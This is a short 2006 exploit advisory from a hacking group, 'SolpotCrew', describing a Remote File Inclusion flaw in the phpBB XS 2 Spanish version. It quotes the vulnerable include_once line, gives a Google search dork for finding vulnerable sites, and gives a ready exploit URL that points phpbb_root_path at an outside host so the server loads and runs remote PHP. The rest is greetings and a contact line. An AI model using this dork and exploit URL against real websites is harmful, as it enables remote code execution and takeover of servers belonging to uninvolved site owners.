#############################SolpotCrew Community################################
#
#  phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion 
#
#  Download  : http://www.elanzuelo.es/phpbb.tar.gz
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006)
#
#       contact: chris_hasibuan@yahoo.com 
# 
#       Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
#              [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta            
#              and all member solpotcrew community @ http://nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "phpbb_root_path" is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  

code from includes/functions_kb.php

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *
 ***************************************************************************/

//
// get_quick_stats();
// gets number of articles
//

include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);


function get_quick_stats()


Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http://injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#########################  
######################################E.O.F##################################